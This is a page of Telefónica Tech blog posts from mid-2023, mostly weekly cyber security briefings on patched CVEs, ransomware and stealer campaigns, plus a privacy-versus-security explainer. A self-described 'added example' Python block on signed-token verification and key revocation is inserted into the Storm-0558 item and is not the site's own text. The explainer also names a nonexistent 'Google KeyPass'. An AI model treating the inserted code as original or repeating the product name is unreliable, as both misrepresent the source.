Telefónica Tech

Telefónica Tech is the leading company in digital transformation. The company offers a wide range of services and integrated technological solutions in Cyber Security, Cloud, IoT, Big Data and Blockchain.

Cyber Security
Security and privacy: difference and impact on reputation
In the digital realm, privacy and security are often used interchangeably. However, although both terms are related and equally important, each refers to a different aspect of protecting personal or sensitive information. Privacy shields you from unwanted prying eyes, while security safeguards you against unauthorized access. Keeping your personal information both private and secure is key to protecting your online reputation.

Understanding the distinction between privacy and security is essential to safeguarding your information, whether it is personal data or not, as well as your online reputation.

Privacy and Security: What They Are and How They Differ

What Is Privacy?

Privacy revolves around the control and management of personal information. It encompasses the right to decide which aspects of your life and identity are shared (what, how, and with whom) and which you choose to keep hidden from the public or from specific individuals. This control over your information includes keeping personal data, images, photographs, online activity, or messages and communications private, to reduce the risk of exposure and its negative consequences. Privacy is pivotal to reputation management.

Key features of online privacy include:

Data privacy: protecting sensitive personal information, such as banking data, medical reports, or personal communications, from unauthorized or malicious access.
Privacy protection: employing measures to safeguard online browsing and activity, ensuring that the part of your digital life you wish to keep private remains so.
Privacy settings: understanding the privacy settings of social media profiles, email accounts, and other digital platforms limits the amount of personal information visible to the public, including friends and contacts.

What Is Security?

Security refers to the measures taken to protect information, digital assets, and systems or devices from potential threats. These threats include cyberattacks, malicious software, and data breaches.

It is a broader concept than privacy and includes proactive measures to protect data, whether ordinary, personal, or sensitive. Security is therefore fundamental to protecting privacy (without security, there is no privacy), and both are necessary to safeguard one's reputation.

✅ Example: unauthorized access to someone's mobile photos or messages (gained because their date of birth serves as the PIN), followed by their public disclosure, can damage their reputation.

Some key components of security include:

Implementing robust cybersecurity measures to defend against cyber threats.
Ensuring safe internet usage through protocols and security tools.
Protecting the network and data from unauthorized access and security breaches.
Safeguarding data through encryption and secure storage.
Staying informed about the latest threats and security measures.
Applying effective security practices, including secure browsing and two-factor authentication (2FA), also on social media.

To protect privacy and security, consider these recommendations:

Use strong passwords and two-factor authentication (2FA) or tools like Google KeyPass.
Understand the privacy settings of your accounts on services and social networks and learn how to configure them.
Review and update app and website permissions.
Exercise caution when sharing personal information.
Learn about phishing and cyber scam risks.
Regularly update the software on your computer and mobile devices, as well as security tools such as antivirus programs.
Limit data sharing, even with acquaintances or trusted apps and websites.
Use a VPN and encrypted messaging apps.

How to Protect and Manage Your Online Reputation

Online reputation is how others perceive you on the internet, and it largely defines your digital identity. Moreover, in today's world it also has real-world implications, affecting how you are perceived personally, socially, or professionally.

✅ Examples:

A company may consider social media content when making hiring decisions during a selection process.
A reputation crisis on the internet, caused by a social media post, can affect a company's financial activity and results.

Privacy and security are two fundamental concepts for safeguarding your data and online reputation. Managing reputation encompasses monitoring opinions about products, services, or publications, as well as overseeing your presence and reputation on the internet and social media. It is an ongoing process that requires time and effort to control your digital footprint: the trail of activity and data left behind when using the internet.

Here are some tactics to protect your online reputation:

Before posting anything online, including on social media, always consider how it might be perceived by others and how it will affect your reputation.
Periodically search for yourself to stay informed about what is said about you online. In addition, monitor your social media profiles to detect any inappropriate or negative content. If you find something inappropriate, take steps to remove it or request its removal from the respective platform.
Be respectful of others, even when interacting with bots. When engaging online, whether through blog comments, forums, or social media, ensure your communication is respectful and constructive. Avoid personal attacks and heated arguments. Remember that everything said online can be tracked and can affect your reputation.
Further protect your personal information by not sharing sensitive details such as your address, phone number, and the companies or banks you are a customer of.
Use strong passwords and do not share them, even with acquaintances. Additionally, exercise caution with phishing or malware-laden emails that attempt to obtain personal information. Always verify the authenticity of websites and sources before providing confidential information.

Image: Freepik.
September 19, 2023
Cyber Security
Cyber Security Briefing, 9 - 15 September
Microsoft patches multiple vulnerabilities including two 0-days

Microsoft released a security update detailing a total of fifty-nine vulnerabilities to be patched, including five of critical severity and two actively exploited 0-days. Of the two 0-days, CVE-2023-36802 (CVSS 7.8) affects Microsoft Streaming Service and would allow an attacker to perform privilege escalation, while CVE-2023-36761 (CVSS 6.2) affects Microsoft Word and can be exploited by an attacker to steal NTLM hashes when a document is opened. The critical vulnerabilities included in the update affect .NET and Visual Studio (CVE-2023-36796, CVE-2023-36792, CVE-2023-36793), Azure Kubernetes Service (CVE-2023-29332) and Windows Internet Connection Sharing (CVE-2023-38148). In addition to the fifty-nine vulnerabilities already mentioned, the update includes five other Microsoft Edge (Chromium) flaws and two flaws from Electron and Autodesk.

More info

SAP patches two critical vulnerabilities at September Security Patch Day

SAP announced the release of thirteen new security patches at its September Security Patch Day, three of which are updates to previously released patches. The most severe vulnerability patched in this release is CVE-2023-40622 (CVSS 9.9), which allows attackers to access BusinessObjects information and in turn enables further attacks to compromise the entire application. SAP also says it has patched another critical vulnerability, CVE-2023-40309 (CVSS 9.8), an authorisation check flaw in CommonCryptoLib that can result in privilege escalation. The patches that address CVE-2023-40309 also address another vulnerability mentioned in this Security Patch Day, CVE-2023-40308 (CVSS 7.5), a memory corruption bug in CommonCryptoLib. Most of the other security notes patch vulnerabilities of medium or low severity.

More info

Public exploit for the ThemeBleed RCE flaw in Windows 11

Researcher Gabe Kirkpatrick published a PoC for a Windows vulnerability discovered in a bug bounty. The flaw, identified as CVE-2023-38146 with CVSS 8.8, allows remote code execution and can be exploited if the user opens a malicious .THEME file created by the attacker. The researcher found the flaw by looking into unusual Windows file formats: when a .MSSTYLES file uses version number 999, the routine that handles it has a discrepancy between the time when the signature of a DLL is verified and the time when the library is loaded. An attacker with a specially crafted .MSSTYLES can replace a verified DLL with a malicious one and execute arbitrary code on the victim's system. Kirkpatrick's PoC opens the Windows Calculator when the user loads the theme file. Microsoft fixed the bug in the Patch Tuesday issued this week by removing the version 999 functionality, although the underlying race between signature verification and DLL loading persists.

More info

3AM: new ransomware used as an alternative to LockBit

Symantec's Threat Hunter Team published an analysis of a new ransomware family, 3AM, which has been used in conjunction with LockBit ransomware in a single attack. As LockBit was blocked by the targeted network, the attackers used 3AM in the incident, successfully infecting three computers. This new ransomware, written in Rust, attempts to stop various services on the infected device before encrypting files, and once encryption is complete it attempts to delete Volume Shadow Copies (VSS). In their ransom note, the attackers state that they will not leak the data they have obtained, but that if the ransom is not paid they will sell the data on the Dark Web. Symantec points out that 3AM is a completely new ransomware family and that its authors have not been associated with any cybercriminal organisation. Having been used as an alternative to LockBit, this new malware is likely to become more popular in the future and to be adopted by other threat actors.

More info

Colombia activates the Cyber Unified Command Post (PMU Ciber) for the attack on IFX Networks

Mauricio Lizcano, minister of the Colombian Ministry of Information Technology and Communications, announced on his official Twitter account that the government has activated the Cyber Unified Command Post (PMU Ciber) to try to mitigate the effects of the cyber attack suffered by telecommunications provider IFX Networks. Lizcano also announced that a total of 762 organisations have been affected, located not only in Colombia but also in Argentina and Chile.

More info

Opening image: kjpargeter / Freepik.
September 15, 2023
Cyber Security
Cyber Security Briefing, 1 - 8 September
DB#JAMMER: malicious campaign against Microsoft SQL servers

The Securonix research team has published an investigation into a malicious campaign called DB#JAMMER in which malicious actors are attacking MS SQL servers to distribute ransomware. The group behind these incidents could not be identified; however, the methodology employed follows the same pattern, which is to gain initial access through brute force attacks on MS SQL servers. Thereafter, they perform network enumeration and reconnaissance tasks, with the aim in the next phase of attacking the system's firewall and establishing persistence by connecting to a remote SMB share to transfer files to and from the victim's system, as well as installing tools such as Cobalt Strike. Finally, the campaign ends with the distribution of the FreeWorld ransomware, which is considered to be a variant of the Mimic ransomware.

More info

New variant of Agent Tesla malware

FortiGuard Labs has discovered a phishing campaign used to spread a new variant of Agent Tesla, a malware family offered as Malware-as-a-Service that combines a remote access trojan (RAT) and a data stealer to gain access to devices. The campaign starts with a phishing email that includes an Excel file which, once opened by the user, exploits the vulnerability CVE-2017-11882/CVE-2018-0802, allowing remote code execution. Agent Tesla is then downloaded and installed, allowing the threat actor to steal sensitive victim information, including credentials, keystrokes and device screenshots. Finally, the malware, which encrypts its most relevant modules to hinder analysis, transmits the stolen information via emails over the SMTP protocol.

More info

New Apple 0-day vulnerabilities actively exploited

Apple has issued a security advisory fixing two new 0-day vulnerabilities that are being actively exploited. One of the security flaws, registered as CVE-2023-41064, is a buffer overflow weakness that is triggered when processing maliciously crafted images and can lead to the execution of arbitrary code. The other, CVE-2023-41061, is a validation issue that can be exploited by means of a malicious attachment. Researchers at Citizen Lab have published research detailing that these vulnerabilities were exploited via an iMessage zero-click exploit chain called BLASTPASS, which was used to deploy NSO Group's Pegasus software via PassKit attachments containing malicious images. Apple recommends that its users update their devices to the following versions: macOS Ventura 13.5.2, iOS 16.6.1, iPadOS 16.6.1 and watchOS 9.6.2.

More info

Android patches one actively exploited vulnerability and three critical ones

Android has released a new bulletin listing the vulnerabilities patched in the September security update, including a high-severity vulnerability that, according to Google, appears to have been exploited. This vulnerability (CVE-2023-35674) would allow a threat actor to perform privilege escalation without the need for user interaction. The bulletin reports a total of 34 patched vulnerabilities, including three of critical severity (CVE-2023-35658, CVE-2023-35673, CVE-2023-35681) that would allow an attacker to remotely execute code without requiring additional execution privileges. The security update targets devices running Android versions 11, 12 and 13, so users of these versions are advised to install the update as soon as possible; users with a device running Android 10 or lower are recommended to upgrade to a device with a newer version.

More info

Investigation of techniques used in Storm-0558 threat actor attacks

Microsoft published an article last July reporting how it mitigated an attack by the threat actor known as Storm-0558, which targeted email accounts of up to 25 different entities across US government agencies, including the State Department, and European institutions. According to recent disclosures, Storm-0558 was able to carry out the attack because it found information about a digital signing key after compromising the corporate account of a Microsoft engineer in April 2021. Thanks to the exfiltration of that key, the threat actor was able to create its own authentication tokens to access the Outlook email accounts of high-ranking government officials. Based on these facts, Microsoft revoked all valid MSA signing keys to prevent access with other compromised keys, and notes that it has not identified any evidence of unauthorised access to customer accounts using the same authentication token forgery technique.

More info

Image: Rawpixel / Freepik.
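The Storm-0558 item above turns on one mechanism: whoever holds a signing key can mint tokens the verifier accepts, and the only remedy is to stop trusting that key. The following added example (not Telefónica Tech's or Microsoft's code; key names, secrets and the token layout are constructed, and HMAC stands in for the asymmetric signatures a real identity provider uses) shows a verifier that keys its trust on an active key set, so that revoking a compromised key rejects every token signed with it, forged or genuine, while tokens under still-active keys keep working.

```python
# Added example: signed-token verification with key revocation (constructed data).
import base64
import hmac
import hashlib
import json
import time

# Constructed key set: key id -> secret. In a real identity provider these would be
# private keys kept in an HSM; here they are plain bytes for the demonstration.
SIGNING_KEYS = {
    "key-2021": b"constructed-secret-2021",
    "key-2023": b"constructed-secret-2023",
}

def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def issue_token(kid: str, subject: str, lifetime_s: int, keys=SIGNING_KEYS, now=None) -> str:
    """Sign {sub, exp} with the key named by kid. Layout: kid.payload.signature."""
    now = time.time() if now is None else now
    payload = _b64(json.dumps({"sub": subject, "exp": int(now + lifetime_s)}).encode())
    sig = hmac.new(keys[kid], f"{kid}.{payload}".encode(), hashlib.sha256).hexdigest()
    return f"{kid}.{payload}.{sig}"

def verify_token(token: str, keys, now=None):
    """Return (ok, reason, claims). A token is accepted only if its kid is still in
    the active key set, its signature matches under that key, and it has not expired."""
    now = time.time() if now is None else now
    try:
        kid, payload, sig = token.split(".")
    except ValueError:
        return False, "malformed", None
    key = keys.get(kid)
    if key is None:
        # Unknown or revoked key: nothing signed with it can be trusted, so a token
        # forged with a stolen copy of that key is rejected here.
        return False, "unknown-or-revoked-key", None
    expected = hmac.new(key, f"{kid}.{payload}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):
        return False, "bad-signature", None
    claims = json.loads(_unb64(payload))
    if claims.get("exp", 0) < now:
        return False, "expired", None
    return True, "ok", claims

def revoke_key(keys: dict, kid: str) -> dict:
    """Return a new active key set without kid (the post-incident key rotation)."""
    return {k: v for k, v in keys.items() if k != kid}

def demo():
    t0 = 1_700_000_000  # constructed fixed clock so results are deterministic
    active = dict(SIGNING_KEYS)
    # A token legitimately issued with key-2021 ...
    legit = issue_token("key-2021", "alice@example.test", 3600, active, now=t0)
    # ... and one forged for another account with a stolen copy of the same key.
    # Before revocation the verifier cannot tell them apart: both pass.
    forged = issue_token("key-2021", "official@example.test", 3600 * 24 * 365, active, now=t0)
    before = (verify_token(legit, active, now=t0)[1], verify_token(forged, active, now=t0)[1])
    # Revoke the compromised key: genuine and forged tokens are now both rejected.
    active = revoke_key(active, "key-2021")
    after = (verify_token(legit, active, now=t0)[1], verify_token(forged, active, now=t0)[1])
    # Tokens issued under a key that is still active keep working.
    fresh = issue_token("key-2023", "alice@example.test", 3600, active, now=t0)
    return before, after, verify_token(fresh, active, now=t0)[1]

if __name__ == "__main__":
    print(demo())
```

The design point is that the verifier looks the key up by id in a set it controls rather than trusting whatever key material accompanies the token; revocation is then a one-line change to that set, which is what makes the "revoke all valid MSA signing keys" response effective against tokens the defender has never seen.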
September 8, 2023
Cyber Security
Cyber Security Briefing, 26 August - 1 September
New variants of LockBit ransomware

Kaspersky researchers have published an article reporting the appearance of new strains of LockBit ransomware. The experts point out that since September 2022, when the LockBit builder was leaked online, anyone has been able to create a customised version of the ransomware. Kaspersky says that, of the 396 samples identified, 312 artefacts are associated with variants derived from the leak. Among these new versions, one incident has been detected in which the ransom note procedure has changed. This note uses the name of a group called National Hazard Agency as its headline (joining other groups that use variants called Bl00dy and Buhti), directly states the amount to be paid, and directs communications to a Tox service and an email address. This contrasts with the LockBit group, which did not mention the amount and handled communication on its own platform. In conclusion, Kaspersky indicates that of the samples analysed, 77 did not carry the LockBit name in the note.

More info

Vulnerability in Intel CPUs affects Windows systems

Microsoft has published an article warning of a new attack exploiting the Downfall vulnerability on Windows devices. The vulnerability, identified as CVE-2022-40982 with a CVSS of 6.5, affects several versions of Intel processors and all versions of Windows 10, Windows 11 and Windows Server 2019 and 2022. If successfully exploited, the flaw would allow an authenticated user with local access to obtain information disclosure, and could be used to infer data belonging to user and kernel mode, processes, virtual machines and trusted execution environments running on affected CPUs. The vulnerability has been mitigated with the Intel Platform Update 23.3 microcode update.

More info

Malicious campaign attacking Citrix NetScaler assets

The Sophos research team has posted on its Twitter profile reporting malicious campaign activity exploiting a vulnerability in Citrix NetScaler. The security flaw in question is CVE-2023-3519, which, according to the experts, a threat actor probably attributable to FIN8 has been exploiting since August, allowing it to perform payload injections, deploy obfuscated PowerShell scripts and place PHP webshells on victims' systems. Sophos also pointed out to BleepingComputer that, given the possible attribution to FIN8, the campaign's specific aim could be to infect its victims with the BlackCat ransomware. It should also be noted that the CVE-2023-3519 vulnerability has been patched since July, but it is estimated that in August there were still more than 31,000 vulnerable assets exposed.

More info

High-severity vulnerability patched in Google Chrome

Google has patched a high-severity vulnerability affecting Chrome in its new security update, version 116.0.5845.140 for Mac and Linux and 116.0.5845.140/.141 for Windows, which will be released over the coming days. The vulnerability, registered as CVE-2023-4572, is a use-after-free vulnerability affecting MediaStream. An attacker could exploit this bug to manipulate the asset if MediaStream does not clear the pointer to a memory location after freeing it. In addition, Google has announced that updates patching high-impact security vulnerabilities will be released weekly instead of every four weeks, in order to deploy security fixes faster. With this, the company also intends the weekly updates to help close the patching gap in Chrome's release cycle.

More info

Analysis of the new SapphireStealer variants

SapphireStealer is a .NET stealer malware focused on stealing credentials from browser databases, whose code was first published on GitHub in December 2022. However, Cisco Talos researchers claim that in early 2023 new versions began to be released, and multiple variants of this malware are currently being used by various threat actors. While SapphireStealer can steal sensitive information from infected devices, including screenshots, browser credentials and host information, the new variants also appear to be focused on enhanced data exfiltration. Finally, it should be noted that this stealer has also been used in conjunction with another malware, FUD-Loader, in multi-stage infections.

More info
September 1, 2023
Cyber Security
Cyber Security Briefing, 19-25 August
Google patches multiple high-severity vulnerabilities in Chrome

Google has released a security update for Chrome that patches five vulnerabilities reported by researchers outside the company, four of which have been classified as high severity. Of the five, CVE-2023-4430, a use-after-free bug in Vulkan, has the highest severity according to the company. Another of the patched vulnerabilities is CVE-2023-4429, also a use-after-free bug, in the Loader component. The other three vulnerabilities patched in the new update allow out-of-bounds memory access and affect CSS (CVE-2023-4428), V8 (CVE-2023-4427) and Fonts (CVE-2023-4431). It should be noted that Google has not mentioned any of the vulnerabilities being exploited in attacks. The company recommends upgrading to Desktop Stable versions 116.0.5845.110 for macOS and Linux or 116.0.5845.110/.111 for Windows.

More info

HiatusRAT targets Taiwan and the US Department of Defence

The threat actor group behind the HiatusRAT malware has resumed its activity, targeting organisations in Taiwan and a US military procurement system. Lumen researchers identified this new campaign, although the actor's identity and origin remain unknown. The threat actors are using new VPS servers to host samples of the malware, and their targets include commercial enterprises and a Taiwanese government entity, as well as a US Department of Defence server. They have adapted the malware to various architectures, with a preference for Ruckus devices, and route their connections from Taiwan, using infected enterprise routers to spy on targets and building a C2 proxy network out of compromised perimeter network devices. Although their objective is uncertain, it is suspected that they are seeking information on military contracts. HiatusRAT, discovered in mid-March 2023, was at that time targeting high-level assets to spy on targets in Latin America and Europe.

More info

FBI seeks to stop Lazarus from withdrawing $40 million in cryptocurrency

The FBI has issued a statement asking cryptocurrency companies to cooperate in preventing Lazarus, a North Korean state-sponsored APT also known as APT38 or TraderTraitor, from withdrawing approximately 1,580 bitcoins obtained through theft and held in wallets it controls. To this end, it has published the addresses of these wallets and asked cryptocurrency companies to analyze the blockchain data associated with them and to block transactions involving them, both directly and indirectly. In the release, the FBI also accuses Lazarus of being responsible for the theft of $60 million from Alphapo, $37 million from CoinsPaid and $100 million from Atomic Wallet.

More info

Danish hosting companies hit by ransomware

Hosting companies CloudNordic and AzeroCloud in Denmark suffered ransomware attacks resulting in the loss of customer data and the shutdown of systems, including websites and email. Despite restoration efforts, the data has proved unrecoverable, and most customers have lost their information. Both brands, which belong to Certiqa Holding ApS, refused to pay a ransom to the threat actors and are cooperating with cybersecurity experts and law enforcement. According to statements from both companies, the attack reached this magnitude because critical servers were infected during a data center migration, which allowed the attackers to access critical administrative, data storage and backup systems. It should also be noted that both CloudNordic and AzeroCloud claim that they found no evidence of unauthorized access to data, although hundreds of customers lost information stored in the cloud.

More info

RCE vulnerability in WinRAR

Zero Day Initiative researcher "goodbyeselene" has discovered a critical vulnerability in WinRAR, the popular file compression tool for Windows. This vulnerability, known as CVE-2023-40477, has raised concerns due to its potential use by threat actors, as it could be exploited by remote attackers to execute arbitrary code on the target system simply by having the user open a RAR archive. The vulnerability lies in the lack of proper validation of user-supplied data, which could lead to memory access beyond the end of an allocated buffer. RARLAB acted quickly after being notified of the vulnerability and released WinRAR version 6.23, which fixes it.

More info

Image: Rawpixel / Freepik.
August 25, 2023
Telefónica Tech
#LadyHacker: Female talent driving progress
Progress knows no gender. #LadyHacker is a global initiative that demonstrates and asserts exactly that. This movement highlights women's essential and necessary role in the technology sector. It also aims to inspire and empower girls and women to explore their potential in STEM careers: Science, Technology, Engineering, and Mathematics.

Diversity fuels innovation, and innovation leads to success. STEM disciplines form the foundation of innovation and progress. From creating the algorithms that power Artificial Intelligence to designing technological solutions that tackle global issues, enhance health and well-being, or reduce our environmental footprint, STEM careers drive the transformation of our society. The push for education and careers in STEM not only accelerates economic development but also fosters a fairer, more inclusive, and more sustainable society.

At Telefónica Tech, women like Carmen, Elena, Jess, Dagmara, María, Karla, and many more #LadyHacker prove every day that gender doesn't define individuals' capabilities in technical and scientific fields. Keep reading to meet them.

#LadyHacker Tamires Abujamra is innovating at Telefónica Tech Brazil (Telefónica Tech, September 14, 2023)
Meet #LadyHacker Karla Parra, Cybersecurity expert at Telefónica Tech (Telefónica Tech, June 20, 2023)
Meet #LadyHacker Jess Woods, Cloud expert at Telefónica Tech (Telefónica Tech, March 8, 2023)
«We are moving towards genderless professions», María Martínez (Telefónica Tech, August 8, 2022)
"To be a hacker in life is to be a passionate, talented person who manages to influence the transformation of society", Carmen Alonso (Telefónica Tech, July 28, 2022)

Image: Freepik.
August 17, 2023
Cyber Security
Cyber Security Briefing, 4-11 August
Microsoft Patch Tuesday for August fixes two actively exploited vulnerabilities

Microsoft has fixed 74 vulnerabilities in its Patch Tuesday for the month of August, including two actively exploited 0-day vulnerabilities and six critical flaws. Specifically, the exploited security flaws have been identified as ADV230003, which refers to an already known security flaw, CVE-2023-36884 (CVSSv3 8.8), whose exploitation allows remote code execution in Office and Windows HTML, and CVE-2023-38180, which, if exploited, can cause a DDoS attack on .NET and Visual Studio applications. It should be noted that Microsoft has acknowledged that a PoC for the latter vulnerability is available. Finally, these updates do not include the twelve vulnerabilities in Microsoft Edge (Chromium) that were fixed earlier this month.

More info: https://msrc.microsoft.com/update-guide/releaseNote/2023-Aug

Downfall: the new vulnerability in Intel microprocessors

A Google researcher, Daniel Moghimi, has discovered how to exploit a new vulnerability, tracked as CVE-2022-40982 or Downfall, that affects Intel processors from the Skylake to the Ice Lake architectures and allows the theft of sensitive information protected by Software Guard Extensions (SGX), Intel's hardware-based memory encryption. Moghimi developed two Downfall attack techniques that employ the gather instruction: Gather Data Sampling (GDS) and Gather Value Injection (GVI). Both require the attacker to run on the same physical processor as the victim, which means a local program or malware could also exploit the vulnerability. While the details of the flaw were kept private for a year in order to find solutions, the hardware redesign that would eliminate the risk of Downfall attacks has not been carried out, although software-based mitigations have been proposed by the researcher.

More info: https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/gather-data-sampling.html

Analysis of the RedHotel threat actor

The team of researchers at Recorded Future has published the results of a research study analysing a threat actor attributed to China and named RedHotel. According to the experts, this threat actor is credited with attacks against 17 countries between 2021 and 2023, although its origin could date back to 2019. RedHotel's targets include academic institutions, aerospace and communication services, although most of them are governmental organisations. Regarding its objectives, this threat actor stands out for its intelligence gathering, as well as its focus on economic espionage. As for its methodology, it is known for exploiting the Log4Shell security flaw, using tools such as Cobalt Strike and Brute Ratel C4 (BRc4) and malware families such as FunnySwitch, ShadowPad, Spyder and Winnti. It also focuses on initial reconnaissance and long-term network access through command and control servers, which are commonly NameCheap-registered domains.

More info: https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf

Infected PDFs used to distribute updated STRRAT malware

Security researchers at Cyble Research and Intelligence Labs (CRIL) have identified that the Java-based RAT called STRRAT, which was capable of keylogging and stealing credentials from browsers and email clients, has evolved dramatically and now has new distribution methods. The updated version incorporates the Crimson ransomware module and deploys a multitude of infection chains. The entry vector is a malicious email; opening the attached PDF prompts the download of a ZIP file containing the malicious JavaScript. To maintain persistence, the RAT creates an entry in the task scheduler with the name Skype. In addition, STRRAT version 1.6 employs two string obfuscation techniques, Zelix KlassMaster (ZKM) and Allatori, which make it difficult for security researchers to analyze and detect the malware.

More info: https://cyble.com/blog/strrats-latest-version-incorporates-dual-obfuscation-layers/

Statc Stealer: new malware masquerading as legitimate Google ads

The Zscaler ThreatLabz team has discovered a new sophisticated malware called Statc Stealer, which infects Windows devices by initially masquerading as a legitimate Google ad. This new stealer is capable of exfiltrating sensitive information such as credit cards, credentials and cryptocurrency wallets from the most commonly used browsers on Windows, including Chrome, Edge, Firefox and Opera. In addition, Statc Stealer is written in C++, uses evasion techniques that avoid detection by thwarting reverse engineering attempts, and uses the HTTPS protocol to send the stolen data encrypted to its command and control server. Zscaler warns that infection with this stealer in organisations and businesses can pose a number of risks, including financial loss and reputational damage.

More info: https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
August 11, 2023
Cyber Security
16 Posts on Cyber Security to Learn and Defend Against Cyber Threats
In an increasingly digitized world, safeguarding our data and information has become essential. With the growing reliance on technology, cyberattacks and threats are also on the rise. In this post, we've curated a selection of content exploring the significance of Cybersecurity and how to tackle current challenges. Through 16 posts, you'll learn about different types of attacks, techniques to prevent them, and tools to detect and respond to security incidents.

A security breach can jeopardize a company's reputation, financial results, and business continuity. Discover the best practices to protect your systems and valuable assets, critical to any organization's continuity, and strengthen your security strategy against cyber threats.

Cyber Security Evolution: AI as a Tool for Attack and Defence (Cyber Security, AI of Things; June 28, 2023)
Out of Office: How to communicate your vacation while protecting your privacy and Cyber Security (Cyber Security; July 6, 2023)
Artificial Intelligence applied to industrial Cyber Security (OT) (Cyber Security, AI of Things; April 25, 2023)
Things you shouldn't share with ChatGPT (Cyber Security, AI of Things; July 4, 2023)
Four cyber security milestones that shaped the future of malware (Cyber Security; May 22, 2023)
How to use Passkey, Google's password substitute (Cyber Security; May 17, 2023)
The importance of access control: is your company protected? (Cyber Security; May 29, 2023)
How language puts business Cybersecurity at risk (Cyber Security; June 1, 2023)
3 Key Cyber Security Considerations (Cyber Security; July 3, 2023)
Typosquatting: how to detect and protect yourself (Cyber Security; June 7, 2023)
Cybersecurity: "black swan" events in a connected world (Cyber Security; March 21, 2023)
Cybercrime, a constant threat to all types of companies (Cyber Security; March 29, 2023)
Cryptography, a tool for protecting data shared on the network (Cyber Security; May 31, 2023)
Evolution of Spear-Phishing Techniques of Notorious Threat Groups and malware used (Cyber Security; April 17, 2023)
Artificial Intelligence, ChatGPT, and Cyber Security (Cyber Security; February 15, 2023)
Consequences of a cyber-attack in industrial environments (Cyber Security; January 17, 2023)

Image by rawpixel.com at Freepik.
July 31, 2023
Cyber Security
Cyber Security Briefing, 22-28 July
Cl0p ransomware campaign exploiting vulnerability in MOVEit
On 31 May 2023, Progress Software released a patch for a critical SQL injection vulnerability that could allow attackers to gain full control of a MOVEit software installation. Specifically, this security flaw, registered as CVE-2023-34362, CVSSv3 9.8, was considered a 0-day because active exploitation was identified before the patch was available. Days later, Microsoft attributed a campaign exploiting this vulnerability to the Cl0p ransomware operators. Since then, the number of victims, according to Konbriefing, has increased to 522 organisations across a multitude of sectors globally, including consulting, technology and retail companies, with the US being the most affected country. Based on these facts, Ryan McConechy, CTO of Barrier Networks, told the digital media outlet Spiceworks that the authorities recommend that organisations do not negotiate with the attackers.
More info: https://www.spiceworks.com/it-security/security-general/articles/moveit-vulnerability-impact-victims/

Critical vulnerability in MikroTik routers
Researchers at VulnCheck reported that a critical elevation of privilege flaw in MikroTik RouterOS routers poses a significant risk to more than 900,000 devices. The vulnerability, identified as CVE-2023-30799 (CVSS 9.1), allows remote threat actors with existing administrator accounts to gain super-admin level through the device's HTTP or Winbox interface. Although valid credentials are required, the system is not protected against brute-force attacks due to a known default admin user. The vulnerability was originally disclosed in June 2022 as an exploit called FOISted without a CVE identifier. However, it was not fully patched until July 2023 for version 6.49.8. A PoC developed by VulnCheck demonstrated that it is possible to control the RouterOS operating system, gain super-admin access through simple privilege escalation, and hide activities. MikroTik recommends applying the latest update, removing administrative interfaces from the Internet, restricting login IP addresses, disabling Winbox and using only SSH with public/private keys to mitigate the vulnerability.
More info: https://vulncheck.com/blog/mikrotik-foisted-revisited

15,000 Citrix servers found vulnerable to RCE attacks
Researchers at the non-profit Shadowserver Foundation have warned that a search of open sources reveals that at least 15,000 Citrix servers are currently vulnerable to CVE-2023-3519, CVSSv3 9.8, which could be exploited by a threat actor to remotely execute code without authentication. It should be noted that exploiting this vulnerability requires the vulnerable device to be configured as a gateway or virtual authentication server. Shadowserver notes that these Citrix NetScaler ADC and Citrix Gateway devices appear with a last update date prior to the release of the patch, so they are assumed to be vulnerable. On the other hand, CISA warned that a critical infrastructure organisation in the United States was recently attacked by a 0-day exploit of this vulnerability.
More info: https://twitter.com/Shadowserver/status/1682355280317919233

Apple releases security update for new 0-day vulnerability
Apple has released a new security update for iOS, iPadOS, macOS, tvOS, watchOS and Safari to address a 0-day vulnerability that, it is aware, has been exploited in recent attacks against iOS versions prior to iOS 15.7.1. The vulnerability, listed as CVE-2023-38606 (not yet assigned a CVSS score), allows a malicious application to potentially change the state of the kernel. CVE-2023-38606 is the third vulnerability related to Operation Triangulation, a zero-click attack (receiving the message triggers infection without any user interaction) against iOS devices via iMessage. The other two 0-days, CVE-2023-32434 and CVE-2023-32435, have already been patched by Apple.
More info: https://support.apple.com/en-us/HT213841

Vulnerability in AMD Zen2 CPUs allows the theft of sensitive data
Google security researcher Tavis Ormandy discovered a new vulnerability affecting AMD Zen2 CPUs that could allow a threat actor to steal sensitive data, such as passwords and encryption keys, at a rate of 30 KB/s from each CPU core. The vulnerability has been classified as CVE-2023-20593 and is caused by improper handling of an instruction called 'vzeroupper' during execution, a common performance-enhancing technique used in all modern processors. After triggering an exploit optimized for the vulnerability, a threat actor could leak sensitive data from any system operation, including those taking place in virtual machines, isolated sandboxes, containers, etc. The Google researcher has published a PoC to exploit the vulnerability.
More info: https://lock.cmpxchg8b.com/zenbleed.html
July 28, 2023
Telefónica Tech
Free online courses to acquire new technological skills
Technology is constantly changing and evolving, gaining more importance in our personal and professional lives. As individuals and professionals, this demands staying up to date with technical knowledge and skills. The summer break, with more free time, is a great opportunity to learn about Cybersecurity, Artificial Intelligence, and IoT (Internet of Things) technology. Fortunately, there are numerous free online resources and courses that can be completed in just a few hours, even from your mobile. These resources serve various purposes: from satisfying personal curiosity to catching up, reinventing yourself, or adapting to the job market. They also help us discover new professional opportunities or explore potential career paths. More than three quarters of companies in the EU say they have difficulties finding workers with the necessary skills. (1) If you're interested in improving your tech skills and finding new career opportunities, this post compiles a selection of content exploring current possibilities in Cybersecurity, programming, Artificial Intelligence, generative AI, and the Internet of Things (IoT).

- How to start programming in Artificial Intelligence: languages, tools and recommendations (January 18, 2023)
- Cyber Security is an essential skill in today's digital era, and Cisco offers a free course in it (July 17, 2023)
- These free Google courses will get you started with generative AI (June 8, 2023)
- Free online courses to learn IoT (Internet of Things) in 2023 (August 3, 2023)

__
1. Source: European Year of Skills 2023.
Image by lookstudio at Freepik.
July 24, 2023
Cyber Security
Cyber Security Briefing, 15-21 July
Campaign targeting the financial sector in Latin America
